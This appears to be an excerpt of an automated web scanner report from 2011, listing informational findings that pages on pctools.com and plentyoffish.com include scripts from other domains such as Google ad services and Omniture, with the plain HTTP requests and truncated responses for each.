Response

18.853. http://www.pctools.com/registry-mechanic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pctools.com
Path:	/registry-mechanic/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
https://www.googleadservices.com/pagead/conversion.js

Request

GET /registry-mechanic/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Thu, 03 Feb 2011 06:48:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38792

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>Windows Registry Cleaner and Repair | Registry Mechanic</title>
   <meta
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
           </script>
...[SNIP]...

18.854. http://www.pctools.com/spyware-doctor/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pctools.com
Path:	/spyware-doctor/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
https://www.googleadservices.com/pagead/conversion.js

Request

GET /spyware-doctor/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Thu, 03 Feb 2011 06:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40386

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>Spyware Doctor | Spyware Removal Scan & Antispyware Software Download<
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
           </script>
...[SNIP]...

18.855. http://www.plentyoffish.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 01 Feb 2011 01:29:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 43002

<html><head><title>
Free Online Dating at Plentyoffish.com™</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.856. http://www.plentyoffish.com/basicsearch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/basicsearch.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /basicsearch.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

18.857. http://www.plentyoffish.com/member1242943.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member1242943.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member1242943.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:32:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37495

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.858. http://www.plentyoffish.com/member16373418.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member16373418.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member16373418.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:33:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37538

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.859. http://www.plentyoffish.com/member19992238.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member19992238.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member19992238.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37542

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.860. http://www.plentyoffish.com/member22529971.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member22529971.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member22529971.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.861. http://www.plentyoffish.com/member22970699.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member22970699.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member22970699.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:31:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37550

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.862. http://www.plentyoffish.com/member23010679.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member23010679.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:33:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37541

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.863. http://www.plentyoffish.com/member23031204.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member23031204.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member23031204.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:30:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37492

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.864. http://www.plentyoffish.com/member23817184.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member23817184.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member23817184.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37486

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.865. http://www.plentyoffish.com/member24663198.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member24663198.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member24663198.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37458

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.866. http://www.plentyoffish.com/member24778333.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member24778333.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member24778333.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:33:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37520

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.867. http://www.plentyoffish.com/member25294614.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member25294614.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member25294614.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:31:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37520

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.868. http://www.plentyoffish.com/member25300504.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member25300504.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member25300504.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37492

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.869. http://www.plentyoffish.com/member25401489.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member25401489.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member25401489.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:30:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37485

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.870. http://www.plentyoffish.com/member25429166.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/member25429166.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /member25429166.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:33:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37480

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.871. http://www.plentyoffish.com/register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/register.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /register.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37538

<html>
   <head>
       <title>Free Dating Site Registration.</title>
       <META HTTP-EQUIV="Content-Language" CONTENT="EN">
       <meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.872. http://www.plentyoffish.com/suggestions_v2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/suggestions_v2.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /suggestions_v2.aspx HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/getpassword.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmz=9489908.1296527588.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; ASP.NET_SessionId=owu154wxdpyyj353a5vg5avm; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:4130340:2592000; screen=1024; __utma=9489908.1831818404.1296523584.1296527588.1296915500.3; __utmc=9489908; __utmb=9489908.9.10.1296915500

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 05 Feb 2011 14:20:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12298

<html><head><title>Plentyoffish.com Free Online Dating Service for singles</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...

<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

18.873. http://www.plentyoffish.com/terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/terms.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /terms.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
